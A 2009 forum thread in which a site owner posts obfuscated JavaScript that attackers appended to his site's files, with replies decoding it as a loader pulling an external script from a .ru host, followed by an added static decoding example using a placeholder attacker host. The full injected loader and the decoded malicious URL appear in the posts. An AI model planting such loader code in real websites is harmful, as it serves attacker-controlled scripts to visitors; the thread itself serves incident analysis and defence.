
Can anyone tell me what this javascript code does?

Discussion in 'HTML & JavaScript' started by j0b0123, Dec 8, 2009.

  1. j0b0123

    j0b0123 Regular Member

    Joined:
    Oct 30, 2009
    Messages:
    262
    Likes Received:
    218
    Occupation:
    professional trader - stocks, forex, futures
    Location:
    Las Vegas, USA
    Home Page:
    Got a virus/trojan on my laptop which was not caught, which grabbed an FTP password for one of my sites. Aholes injected some code, but I am not familiar with even what this does.

    I have fixed the site, this was amended to the end of any index.php file and all .js files. The index.php ones were done with slightly different code (to turn on javascript) but the body was identical to this.

    I am trying to learn what this actually does, as it's the first time I have seen this type of code, and searching on Google does not come up with anything.

    Any help about what this does would be appreciated, luckily I caught the stuff and changed all passwords etc before it got out of hand and spread much.

    Here is the code they put in:

    Code:
    /*GNU GPL*/ try{window.onload = function(){var Hva23p3hnyirlpv7 = document.createElement('script');Hva23p3hnyirlpv7.setAttribute('type', 'text/javascript');Hva23p3hnyirlpv7.setAttribute('id', 'myscript1');Hva23p3hnyirlpv7.setAttribute('src',  'h))t#^t$#))!p&&#:^!&/^^/)^(@m&()y&#b(r@&&!!o)^w(&(s)^)$e(@&#r&))b^a#r!&$-#@c&#o#m#@&.)@$s)a!m$&s#)^u!$^n$g#!.$c!^o^@(m#.^n@!#a@@s#$!a#&-(@^g$o)#v)@&$.(!(@(e)&g&!#r)e)@)a^)t$!s(!(a@!l#e@.@)@r)#u(&#!:)@8!^)0!8$!(0!/^#m$$e)g^&a###v&!i&d!e))#o!@(.(@c&)o$!(m^&/^m&^e((^)g$!((a)#)^v@!i(@&#d#)e@&o$#.^c$!#o@m^/$#&l$a)r#@(e)^^d#&o(!()u#(t$)e##.$f(r^&(@/!(^&b!!i)$$l@)!)d^&.#@&(d$@$e(/)g$o^o$&^g^!&l()e!).(@^#c)$!o#&)@@m!/^$'.replace(/\$|\^|\!|&|\)|\(|@|#/ig, ''));Hva23p3hnyirlpv7.setAttribute('defer', 'defer');document.body.appendChild(Hva23p3hnyirlpv7);}} catch(e) {}
     
    Last edited: Dec 8, 2009
  2. grodt

    grodt Newbie

    Joined:
    Sep 6, 2009
    Messages:
    26
    Likes Received:
    6
    Basically they're adding an external script to your page, which can do and make your users do whatever is capable in the realms of JavaScript.

    Edit: Here is the decoded URL that it fetches the script from: http://mybrowserbar-com.samsung.com.nasa-gov.egreatsale.ru:8080/megavideo.com/megavideo.com/laredoute.fr/bild.de/google.com/
     
    Last edited: Dec 8, 2009
  3. j0b0123

    j0b0123 Regular Member

    Cool, thanks for the decode, I had no idea how to do that so I could see what it was trying to do. I figured it was some kind of bs like that.
     
  4. goawayplease

    goawayplease Regular Member

    Joined:
    Apr 10, 2008
    Messages:
    299
    Likes Received:
    67
    It's using some kind of obfuscation to cover up the script embed; it might be a way to bypass anti-viral scanning or something.

    It's a pretty clever piece of JS.
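
The decode shown in the second post can be reproduced without ever running the injected code. The following is an added example, not part of the original thread: it treats a snippet as plain text, finds the `'…'.replace(/…/, '')` call, applies only that regex to the string literal, and reports which domain actually controls the resulting host. The sample snippet and its host are constructed, and the names `decodeInjectedSrc`, `STRIP_CALL` and `controllingDomain` are chosen here.

```javascript
// Added example: static decode of a junk-character obfuscated script URL.
// The snippet is handled as text only; nothing in it is evaluated or fetched.

// Constructed sample in the style of the injected code (placeholder host).
const SAMPLE = String.raw`try{window.onload=function(){var s=document.createElement('script');s.setAttribute('src', 'h#t)t$p^:!/&/(b@r#a)n$d^-!c&o(m@.#a)t$t^a!c&k(e@r#.)e$x^a!m&p(l@e#:)8$0^8!0&/(p@a#t)h$/'.replace(/\$|\^|\!|&|\)|\(|@|#/ig, ''));document.body.appendChild(s);}}catch(e){}`;

// Finds  'literal'.replace(/pattern/flags, '')  without running the snippet.
const STRIP_CALL =
  /'([^'\\]*)'\s*\.replace\(\s*\/((?:\\.|[^\/\\])+)\/([a-z]*)\s*,\s*''\s*\)/g;

function decodeInjectedSrc(source) {
  const findings = [];
  for (const [, literal, pattern, flags] of source.matchAll(STRIP_CALL)) {
    let stripper;
    try {
      stripper = new RegExp(pattern, flags); // rebuild only the strip regex
    } catch (err) {
      continue; // not a valid regex, so not the pattern we are looking for
    }
    const decoded = literal.replace(stripper, '');
    let url;
    try {
      url = new URL(decoded);
    } catch (err) {
      continue; // decoded text is not an absolute URL
    }
    if (url.protocol !== 'http:' && url.protocol !== 'https:') continue;
    const labels = url.hostname.split('.');
    findings.push({
      url: url.href,
      host: url.hostname,
      port: url.port,
      // Approximation: last two labels, no public-suffix list is consulted.
      // Everything to the left is a subdomain the domain owner chose freely,
      // so familiar brand names there say nothing about who serves the script.
      controllingDomain: labels.slice(-2).join('.'),
    });
  }
  return findings;
}

console.log(decodeInjectedSrc(SAMPLE));
```

Run it with Node.js against the contents of a suspect `.js` or `index.php` file read as a string; an empty result only means this particular obfuscation pattern was not found.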